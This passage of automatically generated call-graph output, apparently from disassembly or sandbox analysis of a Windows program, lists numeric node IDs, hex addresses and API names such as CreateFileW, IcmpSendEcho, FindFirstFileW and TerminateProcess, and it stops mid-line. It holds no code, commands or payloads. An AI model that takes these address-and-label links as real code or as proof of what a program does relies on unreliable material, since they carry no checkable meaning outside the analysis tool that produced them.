104170->104181 104195 df649 20 API calls _abort 104171->104195 104172->104167 104174 deca7 104182 dea68 104174->104182 104177 dec8a 104196 e2b5c 26 API calls pre_c_initialization 104177->104196 104181->104174 104186 dea7a ___scrt_fastfail 104182->104186 104188 dea97 104182->104188 104183 dea87 104263 df649 20 API calls _abort 104183->104263 104185 dea8c 104264 e2b5c 26 API calls pre_c_initialization 104185->104264 104186->104183 104186->104188 104190 deada __fread_nolock 104186->104190 104197 decdc LeaveCriticalSection __fread_nolock 104188->104197 104189 debf6 ___scrt_fastfail 104266 df649 20 API calls _abort 104189->104266 104190->104188 104190->104189 104192 ddcc5 __fread_nolock 26 API calls 104190->104192 104198 e90c5 104190->104198 104265 dd2e8 26 API calls 4 library calls 104190->104265 104192->104190 104195->104177 104196->104172 104197->104172 104199 e90ef 104198->104199 104200 e90d7 104198->104200 104201 e9459 104199->104201 104206 e9134 104199->104206 104202 df636 __dosmaperr 20 API calls 104200->104202 104204 df636 __dosmaperr 20 API calls 104201->104204 104203 e90dc 104202->104203 104207 df649 __dosmaperr 20 API calls 104203->104207 104205 e945e 104204->104205 104208 e90e4 104206->104208 104210 e913f 104206->104210 104217 e916f 104206->104217 104207->104208 104208->104190 104211 df636 __dosmaperr 20 API calls 104210->104211 104212 e9144 104211->104212 104216 e9188 104218 e91ae 104216->104218 104217->104216 104217->104218 104219 e91ca 104217->104219 104263->104185 104264->104188 104265->104190 104266->104185 104270 de858 104267->104270 104269 12311c 104269->104071 104273 de7d9 104270->104273 104272 de875 104272->104269 104274 de7fc 104273->104274 104275 de7e8 104273->104275 104280 de7f8 __alldvrm 104274->104280 104283 e36b2 11 API calls 2 library calls 104274->104283 104281 df649 20 API calls _abort 104275->104281 104277 de7ed 104282 e2b5c 26 API calls pre_c_initialization 104277->104282 104280->104272 104281->104277 104282->104280 104283->104280 104493->103630 104495 b5f4e 104494->104495 104496 b39eb 104494->104496 104495->104496 104497 f5070 DestroyIcon 104495->104497 104496->103640 104528 11d11f 42 API calls _strftime 104496->104528 104497->104496 104499 b62a8 104498->104499 104500 b61c6 104498->104500 104499->103641 104529 b7ad5 104500->104529 104503 f5278 LoadStringW 104507 f5292 104503->104507 104504 b61e1 104505 b8577 8 API calls 104504->104505 104506 b61f6 104505->104506 104508 b6203 104506->104508 104515 f52ae 104506->104515 104510 bbed9 8 API calls 104507->104510 104514 b6229 ___scrt_fastfail 104507->104514 104508->104507 104509 b620d 104508->104509 104511 b6b7c 8 API calls 104509->104511 104510->104514 104512 b621b 104511->104512 104513 b7bb5 8 API calls 104512->104513 104513->104514 104516 b628e Shell_NotifyIconW 104514->104516 104515->104514 104517 f52f1 104515->104517 104518 bbf73 8 API calls 104515->104518 104516->104499 104535 cfe6f 51 API calls 104517->104535 104519 f52d8 104518->104519 104534 11a350 9 API calls 104519->104534 104522 f5310 104524 b6b7c 8 API calls 104522->104524 104523 f52e3 104525 b7bb5 8 API calls 104523->104525 104526 f5321 104524->104526 104525->104517 104527 b6b7c 8 API calls 104526->104527 104527->104514 104528->103640 104530 d017b 8 API calls 104529->104530 104531 b7afa 104530->104531 104532 d014b 8 API calls 104531->104532 104533 b61d4 104532->104533 104533->104503 104533->104504 104534->104523 104535->104522 104537 b6bb4 _wcslen 104536->104537 104538 b6bc7 104537->104538 104539 f5860 104537->104539 104546 b7d74 104538->104546 104541 d014b 8 API calls 104539->104541 104542 f586a 104541->104542 104544 d017b 8 API calls 104542->104544 104543 b6bd4 __fread_nolock 104543->103666 104545 f589a __fread_nolock 104544->104545 104547 b7d8a 104546->104547 104550 b7d85 __fread_nolock 104546->104550 104548 f6528 104547->104548 104549 d017b 8 API calls 104547->104549 104549->104550 104550->104543 104552 b7c1b __fread_nolock 104551->104552 104553 b7be7 104551->104553 104552->103675 104553->104552 104554 f644e 104553->104554 104555 b7c0e 104553->104555 104556 d014b 8 API calls 104554->104556 104557 b7d74 8 API calls 104555->104557 104558 f645d 104556->104558 104557->104552 104559 d017b 8 API calls 104558->104559 104560 f6491 __fread_nolock 104559->104560 104561->103676 104562 bf4c0 104565 ca025 104562->104565 104564 bf4cc 104566 ca046 104565->104566 104571 ca0a3 104565->104571 104566->104571 104574 c0340 104566->104574 104569 10806b 104569->104569 104570 ca0e7 104570->104564 104571->104570 104597 123fe1 81 API calls __wsopen_s 104571->104597 104572 ca077 104572->104570 104572->104571 104573 bbed9 8 API calls 104572->104573 104573->104571 104577 c0376 ISource 104574->104577 104575 d05b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 104575->104577 104576 d014b 8 API calls 104576->104577 104577->104575 104577->104576 104578 10632b 104577->104578 104579 c1695 104577->104579 104582 105cdb 104577->104582 104583 10625a 104577->104583 104584 bbed9 8 API calls 104577->104584 104590 bbf73 8 API calls 104577->104590 104591 c049d ISource 104577->104591 104592 d0413 29 API calls pre_c_initialization 104577->104592 104593 106115 104577->104593 104594 c0aae ISource 104577->104594 104596 d0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 104577->104596 104598 c1990 104577->104598 104660 c1e50 104577->104660 104673 123fe1 81 API calls __wsopen_s 104578->104673 104585 bbed9 8 API calls 104579->104585 104579->104591 104589 bbed9 8 API calls 104582->104589 104582->104591 104672 123fe1 81 API calls __wsopen_s 104583->104672 104584->104577 104585->104591 104589->104591 104590->104577 104591->104572 104592->104577 104670 123fe1 81 API calls __wsopen_s 104593->104670 104671 123fe1 81 API calls __wsopen_s 104594->104671 104596->104577 104597->104569 104599 c1a2e 104598->104599 104600 c19b6 104598->104600 104603 106a4d 104599->104603 104618 c1a3d 104599->104618 104601 106b60 104600->104601 104602 c19c3 104600->104602 104680 1385db 207 API calls 2 library calls 104601->104680 104611 106b84 104602->104611 104614 c19cd 104602->104614 104605 106b54 104603->104605 104606 106a58 104603->104606 104679 123fe1 81 API calls __wsopen_s 104605->104679 104678 cb35c 207 API calls 104606->104678 104608 106bb5 104612 106bc0 104608->104612 104613 106be2 104608->104613 104609 c0340 207 API calls 104609->104618 104611->104608 104616 106b9c 104611->104616 104682 1385db 207 API calls 2 library calls 104612->104682 104683 1360e6 104613->104683 104615 bbed9 8 API calls 104614->104615 104659 c19e0 ISource 104614->104659 104615->104659 104681 123fe1 81 API calls __wsopen_s 104616->104681 104617 106979 104677 123fe1 81 API calls __wsopen_s 104617->104677 104618->104609 104618->104617 104621 c1bb5 104618->104621 104622 106908 104618->104622 104636 c1ba9 104618->104636 104643 c1af4 104618->104643 104618->104659 104621->104577 104676 123fe1 81 API calls __wsopen_s 104622->104676 104625 106dd9 104630 106e0f 104625->104630 104778 1381ce 65 API calls 104625->104778 104628 106c81 104751 121ad8 8 API calls 104628->104751 104780 bb4c8 8 API calls 104630->104780 104632 bbed9 8 API calls 104632->104659 104633 106db7 104754 b8ec0 104633->104754 104635 106ded 104638 b8ec0 52 API calls 104635->104638 104636->104621 104675 123fe1 81 API calls __wsopen_s 104636->104675 104652 106df5 _wcslen 104638->104652 104641 106c08 104648 12148b 8 API calls 104641->104648 104642 106c93 104752 bbd07 8 API calls 104642->104752 104643->104636 104674 c1ca0 8 API calls 104643->104674 104646 10691d ISource 104646->104617 104653 c1b62 ISource 104646->104653 104658 c1a23 ISource 104646->104658 104647 c1b55 104647->104636 104647->104653 104651 106c32 104648->104651 104649 106c9c 104657 12148b 8 API calls 104649->104657 104650 106dbf _wcslen 104650->104625 104777 bb4c8 8 API calls 104650->104777 104690 c2b20 104651->104690 104652->104630 104779 bb4c8 8 API calls 104652->104779 104653->104632 104653->104658 104653->104659 104657->104659 104658->104577 104659->104625 104659->104658 104753 13808f 53 API calls __wsopen_s 104659->104753 104663 c1e6d ISource 104660->104663 104661 c2512 104665 c1ff7 ISource 104661->104665 105283 cbe08 39 API calls 104661->105283 104663->104661 104663->104665 104666 107837 104663->104666 104669 10766b 104663->104669 105281 ce322 8 API calls ISource 104663->105281 104665->104577 104666->104665 105282 dd2d5 39 API calls 104666->105282 105280 dd2d5 39 API calls 104669->105280 104670->104594 104671->104591 104672->104591 104673->104591 104674->104647 104675->104658 104676->104646 104677->104659 104678->104653 104679->104601 104680->104659 104681->104658 104682->104659 104684 136101 104683->104684 104689 106bed 104683->104689 104685 d017b 8 API calls 104684->104685 104688 136123 104685->104688 104686 d014b 8 API calls 104686->104688 104688->104686 104688->104689 104781 121400 8 API calls 104688->104781 104689->104628 104689->104641 104691 c2b86 104690->104691 104692 c2fc0 104690->104692 104694 107bd8 104691->104694 104695 c2ba0 104691->104695 104989 d05b2 5 API calls __Init_thread_wait 104692->104989 104952 137af9 104694->104952 104782 c3160 104695->104782 104697 c2fca 104701 bb329 8 API calls 104697->104701 104706 c300b 104697->104706 104699 107be4 104699->104659 104711 c2fe4 104701->104711 104702 c3160 9 API calls 104703 c2bc6 104702->104703 104705 c2bfc 104703->104705 104703->104706 104704 107bed 104704->104659 104707 107bfd 104705->104707 104730 c2c18 __fread_nolock 104705->104730 104706->104704 104991 bb4c8 8 API calls 104706->104991 104994 123fe1 81 API calls __wsopen_s 104707->104994 104710 c3049 104992 ce6e8 207 API calls 104710->104992 104990 d0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104711->104990 104714 107c15 104995 123fe1 81 API calls __wsopen_s 104714->104995 104715 c2d3f 104717 c2d4c 104715->104717 104718 107c78 104715->104718 104719 c3160 9 API calls 104717->104719 104997 1361a2 53 API calls _wcslen 104718->104997 104721 c2d59 104719->104721 104724 107da1 104721->104724 104726 c3160 9 API calls 104721->104726 104722 d014b 8 API calls 104722->104730 104723 d017b 8 API calls 104723->104730 104734 107c10 104724->104734 104998 123fe1 81 API calls __wsopen_s 104724->104998 104725 c3082 104993 cfe39 8 API calls 104725->104993 104732 c2d73 104726->104732 104729 c0340 207 API calls 104729->104730 104730->104710 104730->104714 104730->104715 104730->104722 104730->104723 104730->104729 104731 107c59 104730->104731 104730->104734 104996 123fe1 81 API calls __wsopen_s 104731->104996 104732->104724 104735 bbed9 8 API calls 104732->104735 104737 c2dd7 ISource 104732->104737 104734->104659 104735->104737 104736 c3160 9 API calls 104736->104737 104737->104724 104737->104725 104737->104734 104737->104736 104739 c2e8b ISource 104737->104739 104792 13a5b2 104737->104792 104798 139ffc 104737->104798 104801 cac3e 104737->104801 104820 b8bda 104737->104820 104895 12f94a 104737->104895 104904 13ad47 104737->104904 104909 139fe8 104737->104909 104912 130fb8 104737->104912 104937 13a9ac 104737->104937 104945 12664c 104737->104945 104738 c2f2d 104738->104659 104739->104738 104988 ce322 8 API calls ISource 104739->104988 104751->104642 104752->104649 104753->104633 104755 b8ed5 104754->104755 104770 b8ed2 104754->104770 104756 b8f0b 104755->104756 104757 b8edd 104755->104757 104760 b8f1d 104756->104760 104767 f6b1f 104756->104767 104769 f6a38 104756->104769 105276 d5536 26 API calls 104757->105276 105277 cfe6f 51 API calls 104760->105277 104761 f6b37 104761->104761 104763 b8eed 104765 d014b 8 API calls 104763->104765 104766 b8ef7 104765->104766 104768 bb329 8 API calls 104766->104768 105279 d54f3 26 API calls 104767->105279 104768->104770 104771 d017b 8 API calls 104769->104771 104776 f6ab1 104769->104776 104770->104650 104772 f6a81 104771->104772 104773 d014b 8 API calls 104772->104773 104774 f6aa8 104773->104774 104775 bb329 8 API calls 104774->104775 104775->104776 105278 cfe6f 51 API calls 104776->105278 104777->104625 104778->104635 104779->104630 104780->104658 104781->104688 104783 c31a1 104782->104783 104788 c317d 104782->104788 104999 d05b2 5 API calls __Init_thread_wait 104783->104999 104786 c31ab 104786->104788 105000 d0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104786->105000 104787 c9f47 104791 c2bb0 104787->104791 105002 d0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104787->105002 104788->104791 105001 d05b2 5 API calls __Init_thread_wait 104788->105001 104791->104702 104794 13a5c5 104792->104794 104793 b8ec0 52 API calls 104795 13a632 104793->104795 104794->104793 104797 13a5d4 104794->104797 105003 1218a9 104795->105003 104797->104737 105044 1389b6 104798->105044 104800 13a00c 104800->104737 104802 b8ec0 52 API calls 104801->104802 104803 cac68 104802->104803 105134 cbc58 104803->105134 104805 cac7f 104816 cb09b _wcslen 104805->104816 105139 bc98d 104805->105139 104807 d4d98 _strftime 40 API calls 104807->104816 104808 cbbbe 43 API calls 104808->104816 104809 b7ad5 8 API calls 104809->104816 104810 b6c03 8 API calls 104810->104816 104813 cb1fb 104813->104737 104814 bc98d 39 API calls 104814->104816 104815 b8ec0 52 API calls 104815->104816 104816->104807 104816->104808 104816->104809 104816->104810 104816->104813 104816->104814 104816->104815 104817 b8577 8 API calls 104816->104817 104818 b396b 60 API calls 104816->104818 104819 b3907 Shell_NotifyIconW 104816->104819 105144 bad40 8 API calls __fread_nolock 104816->105144 105145 b7b1a 8 API calls 104816->105145 104817->104816 104818->104816 104819->104816 104821 b8ec0 52 API calls 104820->104821 104822 b8bf9 104821->104822 104823 b8ec0 52 API calls 104822->104823 104824 b8c0e 104823->104824 104825 b8ec0 52 API calls 104824->104825 104826 b8c21 104825->104826 104827 b8ec0 52 API calls 104826->104827 104828 b8c37 104827->104828 104829 b7ad5 8 API calls 104828->104829 104830 b8c4b 104829->104830 104831 f6767 104830->104831 104832 bc98d 39 API calls 104830->104832 104834 b7e12 8 API calls 104831->104834 104833 b8c72 104832->104833 104833->104831 104850 b8c98 try_get_first_available_module 104833->104850 104835 f6786 104834->104835 104836 b8470 8 API calls 104835->104836 104837 f6798 104836->104837 104841 b8a60 8 API calls 104837->104841 104849 f67bd 104837->104849 104838 b7e12 8 API calls 104842 b8d4e 104838->104842 104839 b8d3c 104839->104838 104840 b8ec0 52 API calls 104846 b8d27 104840->104846 104841->104849 104843 b8d5c 104842->104843 104844 f6873 104842->104844 104847 f696e 104843->104847 104848 b8d71 104843->104848 104851 f687d 104844->104851 104852 f68bc 104844->104852 104853 b8ec0 52 API calls 104846->104853 104858 b8470 8 API calls 104847->104858 104856 b8470 8 API calls 104848->104856 104854 b8e71 104849->104854 104857 b893c 8 API calls 104849->104857 104866 b8a60 8 API calls 104849->104866 105148 b8844 8 API calls __fread_nolock 104849->105148 104850->104839 104850->104840 104892 b8d91 try_get_first_available_module 104850->104892 104859 b8470 8 API calls 104851->104859 104855 b8470 8 API calls 104852->104855 104853->104839 104854->104737 104860 f68c5 104855->104860 104861 b8d79 104856->104861 104857->104849 104862 f697b 104858->104862 104863 f6885 104859->104863 104864 b8a60 8 API calls 104860->104864 104865 bbd57 8 API calls 104861->104865 104867 b8a60 8 API calls 104862->104867 104868 b8ec0 52 API calls 104863->104868 104869 f68e1 104864->104869 104865->104892 104866->104849 104867->104892 104870 f6897 104868->104870 104874 b8ec0 52 API calls 104869->104874 105149 b8844 8 API calls __fread_nolock 104870->105149 104873 f68ab 104875 b893c 8 API calls 104873->104875 104877 f68fc 104874->104877 104878 f68b9 104875->104878 104876 b893c 8 API calls 104876->104892 105150 b8844 8 API calls __fread_nolock 104877->105150 104886 b8a60 8 API calls 104878->104886 104879 f69c1 104880 f69f1 104879->104880 104882 f69e5 104879->104882 104884 b893c 8 API calls 104880->104884 105151 bad40 8 API calls __fread_nolock 104882->105151 104883 b8a60 8 API calls 104883->104892 104888 f69ff 104884->104888 104885 f6910 104889 b893c 8 API calls 104885->104889 104886->104854 104891 b8a60 8 API calls 104888->104891 104889->104878 104890 f69ef 104893 f6a12 104891->104893 104892->104854 104892->104876 104892->104879 104892->104883 105147 b8844 8 API calls __fread_nolock 104892->105147 104894 bbd57 8 API calls 104893->104894 104894->104890 104896 d017b 8 API calls 104895->104896 104897 12f95b 104896->104897 104898 b423c 8 API calls 104897->104898 104899 12f965 104898->104899 104900 b8ec0 52 API calls 104899->104900 104901 12f97c GetEnvironmentVariableW 104900->104901 105152 12160f 8 API calls 104901->105152 104903 12f999 ISource 104903->104737 104905 b8ec0 52 API calls 104904->104905 104906 13ad63 104905->104906 105153 11dd87 CreateToolhelp32Snapshot Process32FirstW 104906->105153 104908 13ad72 104908->104737 104910 1389b6 119 API calls 104909->104910 104911 139ff8 104910->104911 104911->104737 104913 130fe1 104912->104913 104914 13100f WSAStartup 104913->104914 104915 bc98d 39 API calls 104913->104915 104916 131054 104914->104916 104936 131023 ISource 104914->104936 104917 130ffc 104915->104917 105172 cc1f6 104916->105172 104917->104914 104921 bc98d 39 API calls 104917->104921 104920 b8ec0 52 API calls 104922 131069 104920->104922 104923 13100b 104921->104923 105177 cf9d4 WideCharToMultiByte 104922->105177 104923->104914 104925 131075 inet_addr gethostbyname 104926 131093 IcmpCreateFile 104925->104926 104925->104936 104927 1310d3 104926->104927 104926->104936 104928 d017b 8 API calls 104927->104928 104929 1310ec 104928->104929 104930 b423c 8 API calls 104929->104930 104931 1310f7 104930->104931 104932 131102 IcmpSendEcho 104931->104932 104933 13112b IcmpSendEcho 104931->104933 104934 13114c 104932->104934 104933->104934 104935 131212 IcmpCloseHandle WSACleanup 104934->104935 104935->104936 104936->104737 104939 13aa08 104937->104939 104940 13a9c8 104937->104940 104938 13aa26 104938->104940 104941 bc98d 39 API calls 104938->104941 104943 13aa8e 104938->104943 104939->104938 104942 bc98d 39 API calls 104939->104942 104940->104737 104941->104943 104942->104938 105187 120372 104943->105187 104946 b8ec0 52 API calls 104945->104946 104947 126662 104946->104947 105245 11dc54 104947->105245 104949 12666a 104950 12666e GetLastError 104949->104950 104951 126683 104949->104951 104950->104951 104951->104737 104953 137b52 104952->104953 104954 137b38 104952->104954 104956 1360e6 8 API calls 104953->104956 105271 123fe1 81 API calls __wsopen_s 104954->105271 104957 137b5d 104956->104957 104958 c0340 206 API calls 104957->104958 104959 137bc1 104958->104959 104960 137b4a 104959->104960 104961 137c5c 104959->104961 104965 137c03 104959->104965 104960->104699 104962 137c62 104961->104962 104963 137cb0 104961->104963 105272 121ad8 8 API calls 104962->105272 104963->104960 104964 b8ec0 52 API calls 104963->104964 104966 137cc2 104964->104966 104968 12148b 8 API calls 104965->104968 104969 bc2c9 8 API calls 104966->104969 104971 137c3b 104968->104971 104972 137ce6 CharUpperBuffW 104969->104972 104970 137c85 105273 bbd07 8 API calls 104970->105273 104974 c2b20 206 API calls 104971->104974 104975 137d00 104972->104975 104974->104960 104976 137d53 104975->104976 104977 137d07 104975->104977 104978 b8ec0 52 API calls 104976->104978 104981 12148b 8 API calls 104977->104981 104979 137d5b 104978->104979 105274 caa65 9 API calls 104979->105274 104982 137d35 104981->104982 104983 c2b20 206 API calls 104982->104983 104983->104960 104984 137d65 104984->104960 104985 b8ec0 52 API calls 104984->104985 104986 137d80 104985->104986 105275 bbd07 8 API calls 104986->105275 104988->104739 104989->104697 104990->104706 104991->104710 104992->104725 104993->104725 104994->104734 104995->104734 104996->104734 104997->104732 104998->104734 104999->104786 105000->104788 105001->104787 105002->104791 105004 1218b6 105003->105004 105005 d014b 8 API calls 105004->105005 105006 1218bd 105005->105006 105009 11fcb5 105006->105009 105008 1218f7 105008->104797 105010 bc2c9 8 API calls 105009->105010 105011 11fcc8 CharLowerBuffW 105010->105011 105014 11fcdb 105011->105014 105012 b655e 8 API calls 105012->105014 105013 11fd19 105015 11fd2b 105013->105015 105016 b655e 8 API calls 105013->105016 105014->105012 105014->105013 105026 11fce5 ___scrt_fastfail 105014->105026 105017 d017b 8 API calls 105015->105017 105016->105015 105021 11fd59 105017->105021 105020 11fdb8 105023 d014b 8 API calls 105020->105023 105020->105026 105022 11fd7b 105021->105022 105042 11fbed 8 API calls 105021->105042 105027 11fe0c 105022->105027 105024 11fdd2 105023->105024 105025 d017b 8 API calls 105024->105025 105025->105026 105026->105008 105028 bbf73 8 API calls 105027->105028 105029 11fe3e 105028->105029 105030 bbf73 8 API calls 105029->105030 105031 11fe47 105030->105031 105032 bbf73 8 API calls 105031->105032 105037 11fe50 105032->105037 105033 b8577 8 API calls 105033->105037 105034 120114 105034->105020 105035 bad40 8 API calls 105035->105037 105036 d66f8 GetStringTypeW 105036->105037 105037->105033 105037->105034 105037->105035 105037->105036 105039 d6641 39 API calls 105037->105039 105040 11fe0c 40 API calls 105037->105040 105041 bbed9 8 API calls 105037->105041 105043 d6722 GetStringTypeW _strftime 105037->105043 105039->105037 105040->105037 105041->105037 105042->105021 105043->105037 105045 b8ec0 52 API calls 105044->105045 105046 1389ed 105045->105046 105059 138a32 ISource 105046->105059 105082 139730 105046->105082 105048 138eac 105121 139941 59 API calls 105048->105121 105051 138ebb 105053 138ec7 105051->105053 105054 138cec 105051->105054 105052 138aa6 105055 b8ec0 52 API calls 105052->105055 105052->105059 105068 138cde 105052->105068 105114 114ad3 8 API calls __fread_nolock 105052->105114 105115 138f7a 41 API calls _strftime 105052->105115 105053->105059 105095 1388e3 105054->105095 105055->105052 105059->104800 105061 138d25 105109 cffe0 105061->105109 105064 138d45 105116 123fe1 81 API calls __wsopen_s 105064->105116 105065 138d5f 105066 b7e12 8 API calls 105065->105066 105069 138d6e 105066->105069 105068->105048 105068->105054 105071 b8470 8 API calls 105069->105071 105070 138d50 GetCurrentProcess TerminateProcess 105070->105065 105072 138d87 105071->105072 105081 138daf 105072->105081 105117 c1ca0 8 API calls 105072->105117 105074 138f22 105074->105059 105076 138f36 FreeLibrary 105074->105076 105075 138d9e 105118 1395d8 74 API calls 105075->105118 105076->105059 105081->105074 105119 c1ca0 8 API calls 105081->105119 105120 bb4c8 8 API calls 105081->105120 105122 1395d8 74 API calls 105081->105122 105083 bc2c9 8 API calls 105082->105083 105084 13974b CharLowerBuffW 105083->105084 105123 119805 105084->105123 105088 bbf73 8 API calls 105089 139787 105088->105089 105090 bacc0 8 API calls 105089->105090 105091 13979b 105090->105091 105092 badf4 8 API calls 105091->105092 105094 1397a5 _wcslen 105092->105094 105093 1398bb _wcslen 105093->105052 105094->105093 105130 138f7a 41 API calls _strftime 105094->105130 105096 1388fe 105095->105096 105097 138949 105095->105097 105098 d017b 8 API calls 105096->105098 105101 139af3 105097->105101 105099 138920 105098->105099 105099->105097 105100 d014b 8 API calls 105099->105100 105100->105099 105102 139d08 ISource 105101->105102 105107 139b17 _strcat _wcslen ___std_exception_copy 105101->105107 105102->105061 105103 bc98d 39 API calls 105103->105107 105104 bc63f 39 API calls 105104->105107 105105 bca5b 39 API calls 105105->105107 105106 b8ec0 52 API calls 105106->105107 105107->105102 105107->105103 105107->105104 105107->105105 105107->105106 105133 11f8c5 10 API calls _wcslen 105107->105133 105110 cfff5 105109->105110 105111 d008d Sleep 105110->105111 105112 d005b 105110->105112 105113 d007b CloseHandle 105110->105113 105111->105112 105112->105064 105112->105065 105113->105112 105114->105052 105115->105052 105116->105070 105117->105075 105118->105081 105119->105081 105120->105081 105121->105051 105122->105081 105124 119825 _wcslen 105123->105124 105125 119914 105124->105125 105128 11985a 105124->105128 105129 119919 105124->105129 105125->105088 105125->105094 105128->105125 105131 ce36b 41 API calls 105128->105131 105129->105125 105132 ce36b 41 API calls 105129->105132 105130->105093 105131->105128 105132->105129 105133->105107 105135 d014b 8 API calls 105134->105135 105136 cbc65 105135->105136 105137 bb329 8 API calls 105136->105137 105138 cbc70 105137->105138 105138->104805 105140 bc99e 105139->105140 105141 bc9a5 105139->105141 105140->105141 105146 d6641 39 API calls _strftime 105140->105146 105141->104816 105143 bc9e8 105143->104816 105144->104816 105145->104816 105146->105143 105147->104892 105148->104849 105149->104873 105150->104885 105151->104890 105152->104903 105163 11e80e 105153->105163 105155 11ddd4 Process32NextW 105156 11de86 CloseHandle 105155->105156 105160 11ddcd 105155->105160 105156->104908 105157 bbf73 8 API calls 105157->105160 105158 bb329 8 API calls 105158->105160 105159 b568e 8 API calls 105159->105160 105160->105155 105160->105156 105160->105157 105160->105158 105160->105159 105161 b7bb5 8 API calls 105160->105161 105169 ce36b 41 API calls 105160->105169 105161->105160 105165 11e819 105163->105165 105164 11e830 105171 d666b 39 API calls _strftime 105164->105171 105165->105164 105168 11e836 105165->105168 105170 d6722 GetStringTypeW _strftime 105165->105170 105168->105160 105169->105160 105170->105165 105171->105168 105173 d017b 8 API calls 105172->105173 105174 cc209 105173->105174 105175 d014b 8 API calls 105174->105175 105176 cc215 105175->105176 105176->104920 105178 cf9fe 105177->105178 105179 cfa35 105177->105179 105180 d017b 8 API calls 105178->105180 105186 cfe8a 8 API calls 105179->105186 105182 cfa05 WideCharToMultiByte 105180->105182 105185 cfa3e 8 API calls __fread_nolock 105182->105185 105184 cfa29 105184->104925 105185->105184 105186->105184 105219 1202aa 105187->105219 105189 120399 __fread_nolock 105189->104940 105191 1203f3 105235 1205e9 56 API calls __fread_nolock 105191->105235 105192 12040b 105194 120471 105192->105194 105197 12041b 105192->105197 105194->105189 105195 1204a1 105194->105195 105196 120507 105194->105196 105198 1204d1 105195->105198 105199 1204a6 105195->105199 105200 1205b0 105196->105200 105201 120510 105196->105201 105218 120453 105197->105218 105236 122855 10 API calls 105197->105236 105198->105189 105240 bca5b 39 API calls 105198->105240 105199->105189 105239 bca5b 39 API calls 105199->105239 105200->105189 105244 bc63f 39 API calls 105200->105244 105202 120515 105201->105202 105203 12058d 105201->105203 105209 12051b 105202->105209 105210 120554 105202->105210 105203->105189 105243 bc63f 39 API calls 105203->105243 105209->105189 105241 bc63f 39 API calls 105209->105241 105210->105189 105242 bc63f 39 API calls 105210->105242 105212 120427 105237 122855 10 API calls 105212->105237 105216 12043e __fread_nolock 105238 122855 10 API calls 105216->105238 105226 121844 105218->105226 105220 1202f7 105219->105220 105224 1202bb 105219->105224 105221 bc98d 39 API calls 105220->105221 105225 1202f5 105221->105225 105222 b8ec0 52 API calls 105222->105224 105223 d4d98 _strftime 40 API calls 105223->105224 105224->105222 105224->105223 105224->105225 105225->105189 105225->105191 105225->105192 105227 12184f 105226->105227 105228 d014b 8 API calls 105227->105228 105229 121856 105228->105229 105230 121862 105229->105230 105231 121883 105229->105231 105232 d017b 8 API calls 105230->105232 105233 d017b 8 API calls 105231->105233 105234 12186b ___scrt_fastfail 105232->105234 105233->105234 105234->105189 105235->105189 105236->105212 105237->105216 105238->105218 105239->105189 105240->105189 105241->105189 105242->105189 105243->105189 105244->105189 105246 bbf73 8 API calls 105245->105246 105247 11dc73 105246->105247 105248 bbf73 8 API calls 105247->105248 105249 11dc7c 105248->105249 105250 bbf73 8 API calls 105249->105250 105251 11dc85 105250->105251 105252 b5851 9 API calls 105251->105252 105253 11dc90 105252->105253 105269 11eab0 GetFileAttributesW 105253->105269 105256 11dcab 105258 b568e 8 API calls 105256->105258 105257 b6b7c 8 API calls 105257->105256 105259 11dcbf FindFirstFileW 105258->105259 105260 11dd4b FindClose 105259->105260 105263 11dcde 105259->105263 105265 11dd56 105260->105265 105261 11dd26 FindNextFileW 105261->105263 105262 bbed9 8 API calls 105262->105263 105263->105260 105263->105261 105263->105262 105264 b7bb5 8 API calls 105263->105264 105266 b6b7c 8 API calls 105263->105266 105264->105263 105265->104949 105267 11dd17 DeleteFileW 105266->105267 105267->105261 105268 11dd42 FindClose 105267->105268 105268->105265 105270 11dc99 105269->105270 105270->105256 105270->105257 105271->104960 105272->104970 105273->104960 105274->104984 105275->104960 105276->104763 105277->104763 105278->104767 105279->104761 105280->104669 105281->104663 105282->104665 105283->104665 105284 e8782 105289 e853e 105284->105289 105287 e87aa 105290 e856f try_get_first_available_module 105289->105290 105297 e86b8 105290->105297 105304 d917b 40 API calls 2 library calls 105290->105304 105292 e876e 105308 e2b5c 26 API calls pre_c_initialization 105292->105308 105294 e86c3 105294->105287 105301 f0d04 105294->105301 105296 e870c 105296->105297 105305 d917b 40 API calls 2 library calls 105296->105305 105297->105294 105307 df649 20 API calls _abort 105297->105307 105299 e872b 105299->105297 105306 d917b 40 API calls 2 library calls 105299->105306 105309 f0401 105301->105309 105303 f0d1f 105303->105287 105304->105296 105305->105299 105306->105297 105307->105292 105308->105294 105310 f040d CallCatchBlock 105309->105310 105311 f041b 105310->105311 105314 f0454 105310->105314 105367 df649 20 API calls _abort 105311->105367 105313 f0420 105368 e2b5c 26 API calls pre_c_initialization 105313->105368 105320 f09db 105314->105320 105319 f042a __wsopen_s 105319->105303 105370 f07af 105320->105370 105323 f0a0d 105402 df636 20 API calls _abort 105323->105402 105324 f0a26 105388 e5594 105324->105388 105327 f0a2b 105328 f0a4b 105327->105328 105329 f0a34 105327->105329 105401 f071a CreateFileW 105328->105401 105404 df636 20 API calls _abort 105329->105404 105333 f0478 105369 f04a1 LeaveCriticalSection __wsopen_s 105333->105369 105334 f0a39 105405 df649 20 API calls _abort 105334->105405 105336 f0b01 GetFileType 105339 f0b0c GetLastError 105336->105339 105340 f0b53 105336->105340 105337 f0a12 105403 df649 20 API calls _abort 105337->105403 105338 f0ad6 GetLastError 105407 df613 20 API calls __dosmaperr 105338->105407 105408 df613 20 API calls __dosmaperr 105339->105408 105410 e54dd 21 API calls 2 library calls 105340->105410 105341 f0a84 105341->105336 105341->105338 105406 f071a CreateFileW 105341->105406 105344 f0b1a CloseHandle 105344->105337 105346 f0b43 105344->105346 105409 df649 20 API calls _abort 105346->105409 105348 f0ac9 105348->105336 105348->105338 105350 f0b74 105352 f0bc0 105350->105352 105411 f092b 72 API calls 3 library calls 105350->105411 105351 f0b48 105351->105337 105357 f0bed 105352->105357 105412 f04cd 72 API calls 4 library calls 105352->105412 105355 f0be6 105356 f0bfe 105355->105356 105355->105357 105356->105333 105359 f0c7c CloseHandle 105356->105359 105413 e8a2e 105357->105413 105428 f071a CreateFileW 105359->105428 105361 f0ca7 105362 f0cdd 105361->105362 105363 f0cb1 GetLastError 105361->105363 105362->105333 105429 df613 20 API calls __dosmaperr 105363->105429 105365 f0cbd 105430 e56a6 21 API calls 2 library calls 105365->105430 105367->105313 105368->105319 105369->105319 105371 